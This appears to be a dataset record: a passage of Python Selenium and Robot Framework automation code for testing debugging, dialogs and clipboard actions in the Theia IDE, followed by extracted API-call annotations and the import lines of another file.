WebDriverWait(self._driver, constants.DEFAULT_TIMEOUT).until(
expected_conditions.presence_of_element_located(step_locator)
)
line_after_step = editor_obj.get_current_line_num()
print("line after debug step", line_after_step)
step_element = self.find_it(step_locator, parent=editor)
highlight(step_element, effect_time=1)
return line_after_step
def debug_continue(self, file_is_opened=True):
debug_continue_locator = UI.get_debug_continue_locator()
WebDriverWait(self._driver, constants.DEFAULT_TIMEOUT).until(
expected_conditions.presence_of_element_located(debug_continue_locator)
)
editor_obj = self.get_editor_obj()
editor = editor_obj.get_editor_element()
step_locator = UI.get_debug_top_stack_frame_locator()
if file_is_opened:
step_element = self.find_it(step_locator, parent=editor)
highlight(step_element, effect_time=1)
theia_locator = UI.get_theia_left_panel_locator()
theia_panel = self.find_it(theia_locator)
debug_continue_button = self.find_it(debug_continue_locator, parent=theia_panel)
highlight(debug_continue_button, effect_time=1)
self.click_me(debug_continue_button, element_human_name="Continue")
if not file_is_opened:
return None
try:
WebDriverWait(self._driver, constants.DEFAULT_SHORT_TIMEOUT).until(
expected_conditions.invisibility_of_element_located(step_locator)
)
except TimeoutException:
pass
WebDriverWait(self._driver, constants.DEFAULT_TIMEOUT).until(
expected_conditions.presence_of_element_located(step_locator)
)
line_after_continue = editor_obj.get_current_line_num()
print("line after debug continue", line_after_continue)
step_element = self.find_it(step_locator, parent=editor)
highlight(step_element, effect_time=1)
return line_after_continue
@WaitTillExist(timeout=constants.DEFAULT_LONG_TIMEOUT)
def wait_for_debug_to_stop(self):
theia_locator = UI.get_theia_left_panel_locator()
theia_panel = self.find_it(theia_locator)
debug_thread_locator = UI.get_debug_thread_locator()
try:
thread_element = self.find_it(debug_thread_locator, parent=theia_panel)
highlight(thread_element)
raise WebDriverException
except (NoSuchElementException, ElementNotFoundException):
return
except Exception:
raise
def open_preferences(self):
menu = MainMenu(self.get_driver())
menu.invoke_menu_path(constants.Preferences)
@WaitTillExist()
def get_variables_elements(self, parent=None):
variables_elements = self.find_them(UI.get_debug_console_variable_locator(), parent=parent)
if not len(variables_elements):
raise WebDriverException
return variables_elements
@WaitTillExist(timeout=constants.DEFAULT_SHORT_TIMEOUT)
def check_variable_is_updated(self, text, value):
variable_value = text.split(":")[1].strip()
if str(variable_value) != str(value):
raise WebDriverException
def get_variable_element(self, var_name, var_value=None):
editor_obj = self.get_editor_obj()
variables_header = editor_obj.find_variables_header()
highlight(variables_header, effect_time=1)
self.expand_tree(variables_header)
variables_container = self.get_parent_node(variables_header)
highlight(variables_container, effect_time=1)
locals_trees = self.find_them(UI.get_tree_node_content_locator(), parent=variables_container)
locals_found = False
locals_tree = None
for locals_tree in locals_trees:
if locals_tree.text.upper() == constants.THEIA_LOCALS.upper():
locals_found = True
break
if not locals_found:
raise ElementNotFoundException(self.get_driver(), call_from=self.get_variable_element.__name__)
self.expand_tree(locals_tree)
variable_elements = self.get_variables_elements(parent=variables_container)
for variable_element in variable_elements:
highlight(variable_element, effect_time=1)
full_var_text = variable_element.text
variable_name = full_var_text.split(":")[0]
if var_value is not None:
self.check_variable_is_updated(full_var_text, var_value)
print("Current variable '{0}' value: '{1}'".format(var_name, var_value))
print("variable_name", variable_name)
if variable_name.upper() == var_name.upper():
return variable_element
raise NoSuchElementException
def expand_directory_node(self, dir_node, empty_node=False, timeout=None):
content = self.find_file_explorer_content()
self.expand_tree_node(dir_node, content, empty_node=empty_node, timeout=timeout)
@staticmethod
def is_directory(dir_node):
return constants.THEIA_DIR_NODE in dir_node.get_attribute(constants.TYPE_CLASS)
@WaitTillExist(timeout=constants.DEFAULT_SHORT_TIMEOUT)
def enter_in_dialog(self, input_msg, dlg_title=None):
dialog_shell = self.find_it(UI.get_theia_dialog_shell_locator())
dialog_title = self.find_it(UI.get_theia_dialog_title_locator(), parent=dialog_shell)
if dialog_title.text.upper() != dlg_title.upper():
raise ElementNotFoundException
dialog_content = self.find_it(UI.get_theia_dialog_content_locator(), parent=dialog_shell)
input_element = dialog_content.find_element(By.XPATH, "./input")
self.input_value(input_msg, input_element=input_element)
@WaitTillExist(timeout=constants.DEFAULT_SHORT_TIMEOUT)
def answer_ok_to_dialog(self, dlg_title):
dialog_shell = self.find_it(UI.get_theia_dialog_shell_locator())
dialog_title = self.find_it(UI.get_theia_dialog_title_locator(), parent=dialog_shell)
if dialog_title.text.upper() != dlg_title.upper():
raise ElementNotFoundException
dialog_control = self.find_it(UI.get_theia_dialog_control_locator(), parent=dialog_shell)
control_buttons = self.find_them(UI.get_buttons_locator(), parent=dialog_control)
for control_button in control_buttons:
button_text = control_button.text
if button_text.upper() == constants.OK.upper():
self.click_me(control_button, element_human_name=constants.OK, effect_time=1)
@WaitTillExist(timeout=constants.DEFAULT_SHORT_TIMEOUT, should_exist=False, do_dump=False)
def close_dialog(self):
try:
self.switch_to_theia_frame()
dialog_shell = self.find_it(UI.get_theia_dialog_shell_locator())
dialog_title = self.find_it(UI.get_theia_dialog_title_locator(), parent=dialog_shell)
highlight(dialog_title)
if dialog_title.text.upper() == che_constants.CHE_BUG_TITLE.upper():
self.send_key_sequence([Keys.ESCAPE, Keys.ESCAPE, Keys.ESCAPE])
except Exception as e:
raise WebDriverException(msg=e.args)
def get_stop_debug_button(self):
debug_stop_locator = UI.get_debug_stop_locator()
WebDriverWait(self._driver, constants.DEFAULT_TIMEOUT).until(
expected_conditions.presence_of_element_located(debug_stop_locator)
)
theia_locator = UI.get_theia_left_panel_locator()
theia_panel = self.find_it(theia_locator)
debug_stop_button = self.find_it(debug_stop_locator, parent=theia_panel)
if constants.THEIA_MOD_DISABLED in debug_stop_button.get_attribute(constants.TYPE_CLASS):
debug_stop_button = None
return debug_stop_button
def stop_debug(self, retry=False):
debug_stop_button = self.get_stop_debug_button()
if debug_stop_button is None:
return
highlight(debug_stop_button, effect_time=1)
self.click_me(debug_stop_button, element_human_name="Stop Debug")
try:
self.wait_for_debug_to_stop()
except (TimeoutException, CustomTimeoutException):
if retry:
print("Retry to stop debug")
debug_stop_button = self.get_stop_debug_button()
if debug_stop_button is None:
return
highlight(debug_stop_button, effect_time=1)
self.click_me(debug_stop_button, element_human_name="Stop Debug")
self.wait_for_debug_to_stop()
else:
raise
except Exception:
raise
@staticmethod
def current_left_tab(left_tab_element):
left_tab_element_classes = left_tab_element.get_attribute(constants.TYPE_CLASS)
return constants.THEIA_CURRENT_TAB in left_tab_element_classes
@keyword("Get Syntax Ok Message For ${member}")
def get_for_member_syntax_ok_message(self, member):
full_message = lsp_constants.LSP_COBOL_MEMBER_SYNTAX_OK_TEMPLATE.format(member)
return full_message
@keyword("Get Editor")
def get_editor_obj(self):
editor = MonakoEditor(self.get_driver())
return editor
@keyword("See ${text} In Statusbar")
def status_bar_should_have_text(self, text):
theia_status_bar = self.find_it(UI.get_theia_statusbar_locator())
elements_with_commands = self.find_them(UI.get_status_elements(), parent=theia_status_bar)
for elements_with_command in elements_with_commands:
if elements_with_command.text == text:
highlight(elements_with_command, effect_time=1)
return
raise NoSuchElementException
def select_all(self):
# actions = [
# {
# "action": "key_down",
# "value": Keys.CONTROL
# },
# {
# "actions": "send_keys",
# "value": "a"
# },
# {
# "action": "key_up",
# "value": Keys.CONTROL
# }
# ]
# self.execute_key_sequence(actions)
#
# return
actions = ActionChains(self.get_driver())
actions.key_down(Keys.CONTROL)
actions.send_keys("a")
actions.key_up(Keys.CONTROL)
actions.perform()
def copy_to_clipboard(self):
actions = ActionChains(self.get_driver())
actions.key_down(Keys.CONTROL)
actions.send_keys("c")
actions.key_up(Keys.CONTROL)
actions.perform()
def paste_from_clipboard(self):
actions = ActionChains(self.get_driver())
actions.key_down(Keys.CONTROL)
actions.send_keys("v")
actions.key_up(Keys.CONTROL)
actions.perform()
def save_file(self):
actions = ActionChains(self.get_driver())
actions.key_down(Keys.CONTROL)
actions.send_keys("s")
actions.key_up(Keys.CONTROL)
actions.perform()
@staticmethod
def clear_clipboard():
clb_type = pyperclip.determine_clipboard()
print("clipboard", clb_type)
pyperclip.copy("")
@staticmethod
def get_from_clipboard(json_format=True):
res = pyperclip.paste()
print("clipboard res: '{0}' - '{1}'".format(res, type(res)))
if json_format:
res = json.loads(res)
print("json res: '{0}' - '{1}'".format(res, type(res)))
return json.dumps(res, indent=3)
@staticmethod
def get_to_clipboard(value):
pyperclip.copy(value)
@staticmethod
@keyword("Modify User Preferences")
def append_dict(pref_dict, merge_dict):
if isinstance(pref_dict, str):
pref_dict = json.loads(pref_dict)
for key in merge_dict:
pref_dict[key] = merge_dict[key]
return json.dumps(pref_dict, indent=3)
|
[
"selenium.common.exceptions.WebDriverException",
"pyperclip.determine_clipboard",
"inc.theia.ui.UI.get_files_explorer_locator",
"json.dumps",
"inc.theia.ui.UI.get_debug_top_stack_frame_locator",
"inc.theia.constants.OK.upper",
"inc.theia.ui.UI.get_theia_statusbar_locator",
"inc.theia.ui.UI.get_debug_stop_locator",
"inc.theia.ui.UI.get_debug_step_over_locator",
"inc.theia.lsp_constants.LSP_COBOL_MEMBER_SYNTAX_OK_TEMPLATE.format",
"pyperclip.paste",
"json.loads",
"inc.theia.ui.UI.get_debug_tab_locator",
"inc.theia.ui.UI.get_files_explorer_tab_locator",
"inc.theia.ui.UI.get_debug_continue_locator",
"inc.theia.ui.UI.get_status_elements",
"inc.theia.ui.UI.get_theia_left_right_panel_locator",
"inc.theia.ui.UI.get_buttons_locator",
"inc.theia.ui.UI.get_theia_dialog_title_locator",
"inc.theia.ui.UI.get_debug_thread_locator",
"inc.theia.ui.UI.get_debug_console_variable_locator",
"inc.theia.ui.UI.get_debug_start_locator",
"inc.theia.constants.THEIA_LOCALS.upper",
"inc.theia.ui.UI.get_theia_dialog_control_locator",
"pyperclip.copy",
"inc.theia.ui.UI.get_tree_node_content_locator",
"selenium.webdriver.support.expected_conditions.presence_of_element_located",
"robot.api.deco.keyword",
"inc.theia.ui.UI.get_theia_dialog_shell_locator",
"selenium.webdriver.support.expected_conditions.invisibility_of_element_located",
"selenium.webdriver.support.wait.WebDriverWait",
"inc.theia.ui.UI.get_theia_left_panel_locator",
"inc.theia.ui.UI.get_theia_dialog_content_locator",
"inc.decorators.wait_till_exist.WaitTillExist",
"inc.helpers.highlight"
] |
[((3175, 3190), 'inc.decorators.wait_till_exist.WaitTillExist', 'WaitTillExist', ([], {}), '()\n', (3188, 3190), False, 'from inc.decorators.wait_till_exist import WaitTillExist\n'), ((3465, 3531), 'inc.decorators.wait_till_exist.WaitTillExist', 'WaitTillExist', ([], {'timeout': 'constants.DEFAULT_HUGE_TIMEOUT', 'interval': '(10)'}), '(timeout=constants.DEFAULT_HUGE_TIMEOUT, interval=10)\n', (3478, 3531), False, 'from inc.decorators.wait_till_exist import WaitTillExist\n'), ((8564, 8617), 'inc.decorators.wait_till_exist.WaitTillExist', 'WaitTillExist', ([], {'timeout': 'constants.DEFAULT_LONG_TIMEOUT'}), '(timeout=constants.DEFAULT_LONG_TIMEOUT)\n', (8577, 8617), False, 'from inc.decorators.wait_till_exist import WaitTillExist\n'), ((9264, 9279), 'inc.decorators.wait_till_exist.WaitTillExist', 'WaitTillExist', ([], {}), '()\n', (9277, 9279), False, 'from inc.decorators.wait_till_exist import WaitTillExist\n'), ((9549, 9603), 'inc.decorators.wait_till_exist.WaitTillExist', 'WaitTillExist', ([], {'timeout': 'constants.DEFAULT_SHORT_TIMEOUT'}), '(timeout=constants.DEFAULT_SHORT_TIMEOUT)\n', (9562, 9603), False, 'from inc.decorators.wait_till_exist import WaitTillExist\n'), ((11743, 11797), 'inc.decorators.wait_till_exist.WaitTillExist', 'WaitTillExist', ([], {'timeout': 'constants.DEFAULT_SHORT_TIMEOUT'}), '(timeout=constants.DEFAULT_SHORT_TIMEOUT)\n', (11756, 11797), False, 'from inc.decorators.wait_till_exist import WaitTillExist\n'), ((12368, 12422), 'inc.decorators.wait_till_exist.WaitTillExist', 'WaitTillExist', ([], {'timeout': 'constants.DEFAULT_SHORT_TIMEOUT'}), '(timeout=constants.DEFAULT_SHORT_TIMEOUT)\n', (12381, 12422), False, 'from inc.decorators.wait_till_exist import WaitTillExist\n'), ((13180, 13273), 'inc.decorators.wait_till_exist.WaitTillExist', 'WaitTillExist', ([], {'timeout': 'constants.DEFAULT_SHORT_TIMEOUT', 'should_exist': '(False)', 'do_dump': '(False)'}), '(timeout=constants.DEFAULT_SHORT_TIMEOUT, should_exist=False,\n do_dump=False)\n', (13193, 13273), False, 'from inc.decorators.wait_till_exist import WaitTillExist\n'), ((15526, 15572), 'robot.api.deco.keyword', 'keyword', (['"""Get Syntax Ok Message For ${member}"""'], {}), "('Get Syntax Ok Message For ${member}')\n", (15533, 15572), False, 'from robot.api.deco import keyword\n'), ((15751, 15772), 'robot.api.deco.keyword', 'keyword', (['"""Get Editor"""'], {}), "('Get Editor')\n", (15758, 15772), False, 'from robot.api.deco import keyword\n'), ((15880, 15915), 'robot.api.deco.keyword', 'keyword', (['"""See ${text} In Statusbar"""'], {}), "('See ${text} In Statusbar')\n", (15887, 15915), False, 'from robot.api.deco import keyword\n'), ((18270, 18304), 'robot.api.deco.keyword', 'keyword', (['"""Modify User Preferences"""'], {}), "('Modify User Preferences')\n", (18277, 18304), False, 'from robot.api.deco import keyword\n'), ((2589, 2622), 'inc.theia.ui.UI.get_theia_left_panel_locator', 'UI.get_theia_left_panel_locator', ([], {}), '()\n', (2620, 2622), False, 'from inc.theia.ui import UI\n'), ((2841, 2868), 'inc.helpers.highlight', 'highlight', (['theia_left_panel'], {}), '(theia_left_panel)\n', (2850, 2868), False, 'from inc.helpers import highlight\n'), ((3638, 3677), 'inc.theia.ui.UI.get_theia_left_right_panel_locator', 'UI.get_theia_left_right_panel_locator', ([], {}), '()\n', (3675, 3677), False, 'from inc.theia.ui import UI\n'), ((4014, 4041), 'inc.helpers.highlight', 'highlight', (['debug_id_element'], {}), '(debug_id_element)\n', (4023, 4041), False, 'from inc.helpers import highlight\n'), ((4200, 4228), 'inc.theia.ui.UI.get_debug_start_locator', 'UI.get_debug_start_locator', ([], {}), '()\n', (4226, 4228), False, 'from inc.theia.ui import UI\n'), ((4420, 4453), 'inc.theia.ui.UI.get_theia_left_panel_locator', 'UI.get_theia_left_panel_locator', ([], {}), '()\n', (4451, 4453), False, 'from inc.theia.ui import UI\n'), ((4595, 4639), 'inc.helpers.highlight', 'highlight', (['debug_start_button'], {'effect_time': '(1)'}), '(debug_start_button, effect_time=1)\n', (4604, 4639), False, 'from inc.helpers import highlight\n'), ((4748, 4777), 'inc.theia.ui.UI.get_debug_thread_locator', 'UI.get_debug_thread_locator', ([], {}), '()\n', (4775, 4777), False, 'from inc.theia.ui import UI\n'), ((5132, 5164), 'inc.theia.ui.UI.get_debug_step_over_locator', 'UI.get_debug_step_over_locator', ([], {}), '()\n', (5162, 5164), False, 'from inc.theia.ui import UI\n'), ((5452, 5490), 'inc.theia.ui.UI.get_debug_top_stack_frame_locator', 'UI.get_debug_top_stack_frame_locator', ([], {}), '()\n', (5488, 5490), False, 'from inc.theia.ui import UI\n'), ((5564, 5602), 'inc.helpers.highlight', 'highlight', (['step_element'], {'effect_time': '(1)'}), '(step_element, effect_time=1)\n', (5573, 5602), False, 'from inc.helpers import highlight\n'), ((5628, 5661), 'inc.theia.ui.UI.get_theia_left_panel_locator', 'UI.get_theia_left_panel_locator', ([], {}), '()\n', (5659, 5661), False, 'from inc.theia.ui import UI\n'), ((5811, 5859), 'inc.helpers.highlight', 'highlight', (['debug_step_over_button'], {'effect_time': '(1)'}), '(debug_step_over_button, effect_time=1)\n', (5820, 5859), False, 'from inc.helpers import highlight\n'), ((6843, 6881), 'inc.helpers.highlight', 'highlight', (['step_element'], {'effect_time': '(1)'}), '(step_element, effect_time=1)\n', (6852, 6881), False, 'from inc.helpers import highlight\n'), ((6999, 7030), 'inc.theia.ui.UI.get_debug_continue_locator', 'UI.get_debug_continue_locator', ([], {}), '()\n', (7028, 7030), False, 'from inc.theia.ui import UI\n'), ((7312, 7350), 'inc.theia.ui.UI.get_debug_top_stack_frame_locator', 'UI.get_debug_top_stack_frame_locator', ([], {}), '()\n', (7348, 7350), False, 'from inc.theia.ui import UI\n'), ((7524, 7557), 'inc.theia.ui.UI.get_theia_left_panel_locator', 'UI.get_theia_left_panel_locator', ([], {}), '()\n', (7555, 7557), False, 'from inc.theia.ui import UI\n'), ((7705, 7752), 'inc.helpers.highlight', 'highlight', (['debug_continue_button'], {'effect_time': '(1)'}), '(debug_continue_button, effect_time=1)\n', (7714, 7752), False, 'from inc.helpers import highlight\n'), ((8483, 8521), 'inc.helpers.highlight', 'highlight', (['step_element'], {'effect_time': '(1)'}), '(step_element, effect_time=1)\n', (8492, 8521), False, 'from inc.helpers import highlight\n'), ((8680, 8713), 'inc.theia.ui.UI.get_theia_left_panel_locator', 'UI.get_theia_left_panel_locator', ([], {}), '()\n', (8711, 8713), False, 'from inc.theia.ui import UI\n'), ((8795, 8824), 'inc.theia.ui.UI.get_debug_thread_locator', 'UI.get_debug_thread_locator', ([], {}), '()\n', (8822, 8824), False, 'from inc.theia.ui import UI\n'), ((9970, 10012), 'inc.helpers.highlight', 'highlight', (['variables_header'], {'effect_time': '(1)'}), '(variables_header, effect_time=1)\n', (9979, 10012), False, 'from inc.helpers import highlight\n'), ((10135, 10180), 'inc.helpers.highlight', 'highlight', (['variables_container'], {'effect_time': '(1)'}), '(variables_container, effect_time=1)\n', (10144, 10180), False, 'from inc.helpers import highlight\n'), ((13873, 13900), 'inc.theia.ui.UI.get_debug_stop_locator', 'UI.get_debug_stop_locator', ([], {}), '()\n', (13898, 13900), False, 'from inc.theia.ui import UI\n'), ((14086, 14119), 'inc.theia.ui.UI.get_theia_left_panel_locator', 'UI.get_theia_left_panel_locator', ([], {}), '()\n', (14117, 14119), False, 'from inc.theia.ui import UI\n'), ((14585, 14628), 'inc.helpers.highlight', 'highlight', (['debug_stop_button'], {'effect_time': '(1)'}), '(debug_stop_button, effect_time=1)\n', (14594, 14628), False, 'from inc.helpers import highlight\n'), ((15652, 15716), 'inc.theia.lsp_constants.LSP_COBOL_MEMBER_SYNTAX_OK_TEMPLATE.format', 'lsp_constants.LSP_COBOL_MEMBER_SYNTAX_OK_TEMPLATE.format', (['member'], {}), '(member)\n', (15708, 15716), False, 'from inc.theia import constants, lsp_constants\n'), ((17732, 17763), 'pyperclip.determine_clipboard', 'pyperclip.determine_clipboard', ([], {}), '()\n', (17761, 17763), False, 'import pyperclip\n'), ((17809, 17827), 'pyperclip.copy', 'pyperclip.copy', (['""""""'], {}), "('')\n", (17823, 17827), False, 'import pyperclip\n'), ((17907, 17924), 'pyperclip.paste', 'pyperclip.paste', ([], {}), '()\n', (17922, 17924), False, 'import pyperclip\n'), ((18138, 18163), 'json.dumps', 'json.dumps', (['res'], {'indent': '(3)'}), '(res, indent=3)\n', (18148, 18163), False, 'import json\n'), ((18224, 18245), 'pyperclip.copy', 'pyperclip.copy', (['value'], {}), '(value)\n', (18238, 18245), False, 'import pyperclip\n'), ((18527, 18558), 'json.dumps', 'json.dumps', (['pref_dict'], {'indent': '(3)'}), '(pref_dict, indent=3)\n', (18537, 18558), False, 'import json\n'), ((1640, 1673), 'inc.theia.ui.UI.get_theia_left_panel_locator', 'UI.get_theia_left_panel_locator', ([], {}), '()\n', (1671, 1673), False, 'from inc.theia.ui import UI\n'), ((2705, 2767), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'expected_conditions.presence_of_element_located', (['theia_locator'], {}), '(theia_locator)\n', (2752, 2767), False, 'from selenium.webdriver.support import expected_conditions\n'), ((3763, 3785), 'inc.helpers.highlight', 'highlight', (['theia_panel'], {}), '(theia_panel)\n', (3772, 3785), False, 'from inc.helpers import highlight\n'), ((4316, 4384), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'expected_conditions.presence_of_element_located', (['debug_start_locator'], {}), '(debug_start_locator)\n', (4363, 4384), False, 'from selenium.webdriver.support import expected_conditions\n'), ((4865, 4934), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'expected_conditions.presence_of_element_located', (['debug_thread_locator'], {}), '(debug_thread_locator)\n', (4912, 4934), False, 'from selenium.webdriver.support import expected_conditions\n'), ((5252, 5324), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'expected_conditions.presence_of_element_located', (['debug_step_over_locator'], {}), '(debug_step_over_locator)\n', (5299, 5324), False, 'from selenium.webdriver.support import expected_conditions\n'), ((6580, 6641), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'expected_conditions.presence_of_element_located', (['step_locator'], {}), '(step_locator)\n', (6627, 6641), False, 'from selenium.webdriver.support import expected_conditions\n'), ((7113, 7184), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'expected_conditions.presence_of_element_located', (['debug_continue_locator'], {}), '(debug_continue_locator)\n', (7160, 7184), False, 'from selenium.webdriver.support import expected_conditions\n'), ((7460, 7498), 'inc.helpers.highlight', 'highlight', (['step_element'], {'effect_time': '(1)'}), '(step_element, effect_time=1)\n', (7469, 7498), False, 'from inc.helpers import highlight\n'), ((8208, 8269), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'expected_conditions.presence_of_element_located', (['step_locator'], {}), '(step_locator)\n', (8255, 8269), False, 'from selenium.webdriver.support import expected_conditions\n'), ((8934, 8959), 'inc.helpers.highlight', 'highlight', (['thread_element'], {}), '(thread_element)\n', (8943, 8959), False, 'from inc.helpers import highlight\n'), ((9375, 9414), 'inc.theia.ui.UI.get_debug_console_variable_locator', 'UI.get_debug_console_variable_locator', ([], {}), '()\n', (9412, 9414), False, 'from inc.theia.ui import UI\n'), ((10220, 10254), 'inc.theia.ui.UI.get_tree_node_content_locator', 'UI.get_tree_node_content_locator', ([], {}), '()\n', (10252, 10254), False, 'from inc.theia.ui import UI\n'), ((10839, 10881), 'inc.helpers.highlight', 'highlight', (['variable_element'], {'effect_time': '(1)'}), '(variable_element, effect_time=1)\n', (10848, 10881), False, 'from inc.helpers import highlight\n'), ((11892, 11927), 'inc.theia.ui.UI.get_theia_dialog_shell_locator', 'UI.get_theia_dialog_shell_locator', ([], {}), '()\n', (11925, 11927), False, 'from inc.theia.ui import UI\n'), ((11965, 12000), 'inc.theia.ui.UI.get_theia_dialog_title_locator', 'UI.get_theia_dialog_title_locator', ([], {}), '()\n', (11998, 12000), False, 'from inc.theia.ui import UI\n'), ((12164, 12201), 'inc.theia.ui.UI.get_theia_dialog_content_locator', 'UI.get_theia_dialog_content_locator', ([], {}), '()\n', (12199, 12201), False, 'from inc.theia.ui import UI\n'), ((12505, 12540), 'inc.theia.ui.UI.get_theia_dialog_shell_locator', 'UI.get_theia_dialog_shell_locator', ([], {}), '()\n', (12538, 12540), False, 'from inc.theia.ui import UI\n'), ((12578, 12613), 'inc.theia.ui.UI.get_theia_dialog_title_locator', 'UI.get_theia_dialog_title_locator', ([], {}), '()\n', (12611, 12613), False, 'from inc.theia.ui import UI\n'), ((12777, 12814), 'inc.theia.ui.UI.get_theia_dialog_control_locator', 'UI.get_theia_dialog_control_locator', ([], {}), '()\n', (12812, 12814), False, 'from inc.theia.ui import UI\n'), ((12878, 12902), 'inc.theia.ui.UI.get_buttons_locator', 'UI.get_buttons_locator', ([], {}), '()\n', (12900, 12902), False, 'from inc.theia.ui import UI\n'), ((13539, 13562), 'inc.helpers.highlight', 'highlight', (['dialog_title'], {}), '(dialog_title)\n', (13548, 13562), False, 'from inc.helpers import highlight\n'), ((13983, 14050), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'expected_conditions.presence_of_element_located', (['debug_stop_locator'], {}), '(debug_stop_locator)\n', (14030, 14050), False, 'from selenium.webdriver.support import expected_conditions\n'), ((16005, 16037), 'inc.theia.ui.UI.get_theia_statusbar_locator', 'UI.get_theia_statusbar_locator', ([], {}), '()\n', (16035, 16037), False, 'from inc.theia.ui import UI\n'), ((16087, 16111), 'inc.theia.ui.UI.get_status_elements', 'UI.get_status_elements', ([], {}), '()\n', (16109, 16111), False, 'from inc.theia.ui import UI\n'), ((18038, 18053), 'json.loads', 'json.loads', (['res'], {}), '(res)\n', (18048, 18053), False, 'import json\n'), ((18412, 18433), 'json.loads', 'json.loads', (['pref_dict'], {}), '(pref_dict)\n', (18422, 18433), False, 'import json\n'), ((1897, 1928), 'inc.theia.ui.UI.get_files_explorer_locator', 'UI.get_files_explorer_locator', ([], {}), '()\n', (1926, 1928), False, 'from inc.theia.ui import UI\n'), ((2631, 2685), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_TIMEOUT)\n', (2644, 2685), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((2915, 2941), 'inc.theia.ui.UI.get_debug_tab_locator', 'UI.get_debug_tab_locator', ([], {}), '()\n', (2939, 2941), False, 'from inc.theia.ui import UI\n'), ((3325, 3360), 'inc.theia.ui.UI.get_files_explorer_tab_locator', 'UI.get_files_explorer_tab_locator', ([], {}), '()\n', (3358, 3360), False, 'from inc.theia.ui import UI\n'), ((4237, 4296), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_LONG_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_LONG_TIMEOUT)\n', (4250, 4296), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((4786, 4845), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_LONG_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_LONG_TIMEOUT)\n', (4799, 4845), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((5173, 5232), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_LONG_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_LONG_TIMEOUT)\n', (5186, 5232), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((6367, 6432), 'selenium.webdriver.support.expected_conditions.invisibility_of_element_located', 'expected_conditions.invisibility_of_element_located', (['step_locator'], {}), '(step_locator)\n', (6418, 6432), False, 'from selenium.webdriver.support import expected_conditions\n'), ((6506, 6560), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_TIMEOUT)\n', (6519, 6560), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((7039, 7093), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_TIMEOUT)\n', (7052, 7093), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((7995, 8060), 'selenium.webdriver.support.expected_conditions.invisibility_of_element_located', 'expected_conditions.invisibility_of_element_located', (['step_locator'], {}), '(step_locator)\n', (8046, 8060), False, 'from selenium.webdriver.support import expected_conditions\n'), ((8134, 8188), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_TIMEOUT)\n', (8147, 8188), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((10424, 10454), 'inc.theia.constants.THEIA_LOCALS.upper', 'constants.THEIA_LOCALS.upper', ([], {}), '()\n', (10452, 10454), False, 'from inc.theia import constants, lsp_constants\n'), ((13058, 13078), 'inc.theia.constants.OK.upper', 'constants.OK.upper', ([], {}), '()\n', (13076, 13078), False, 'from inc.theia import constants, lsp_constants\n'), ((13392, 13427), 'inc.theia.ui.UI.get_theia_dialog_shell_locator', 'UI.get_theia_dialog_shell_locator', ([], {}), '()\n', (13425, 13427), False, 'from inc.theia.ui import UI\n'), ((13469, 13504), 'inc.theia.ui.UI.get_theia_dialog_title_locator', 'UI.get_theia_dialog_title_locator', ([], {}), '()\n', (13502, 13504), False, 'from inc.theia.ui import UI\n'), ((13775, 13805), 'selenium.common.exceptions.WebDriverException', 'WebDriverException', ([], {'msg': 'e.args'}), '(msg=e.args)\n', (13793, 13805), False, 'from selenium.common.exceptions import NoSuchElementException, WebDriverException, TimeoutException\n'), ((13909, 13963), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_TIMEOUT)\n', (13922, 13963), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((16266, 16313), 'inc.helpers.highlight', 'highlight', (['elements_with_command'], {'effect_time': '(1)'}), '(elements_with_command, effect_time=1)\n', (16275, 16313), False, 'from inc.helpers import highlight\n'), ((3141, 3167), 'inc.theia.ui.UI.get_debug_tab_locator', 'UI.get_debug_tab_locator', ([], {}), '()\n', (3165, 3167), False, 'from inc.theia.ui import UI\n'), ((6283, 6343), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_SHORT_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_SHORT_TIMEOUT)\n', (6296, 6343), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((7911, 7971), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_SHORT_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_SHORT_TIMEOUT)\n', (7924, 7971), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((15040, 15083), 'inc.helpers.highlight', 'highlight', (['debug_stop_button'], {'effect_time': '(1)'}), '(debug_stop_button, effect_time=1)\n', (15049, 15083), False, 'from inc.helpers import highlight\n')]
|
import torch
import random
import pytorch_lightning as pl
from x_transformers import *
from x_transformers.autoregressive_wrapper import *
